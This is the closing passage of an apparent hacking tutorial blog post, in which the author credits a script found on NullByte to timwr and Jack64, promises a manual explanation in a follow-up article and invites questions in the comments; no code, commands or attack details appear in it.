You must have noticed I haven’t explained anything, rather asked you to blindly follow. As none of us wants to be a script kiddie, we will learn how to do this manually in the next article. To be honest, I didn’t know how to successfully implement this until I found this script. After I saw that this script does what it promises, I learned the process by reverse-engineering it. Let us leave that story for another article.

If you face any problem, don’t forget to mention it in the comments. I’ll try to help you in any way I can.


I found the script in the comments section of a thread on NullByte, so thanks to the guy who shared it; I’m sorry I don’t remember which thread it was or who the guy was. And credit for making this script goes to timwr and Jack64.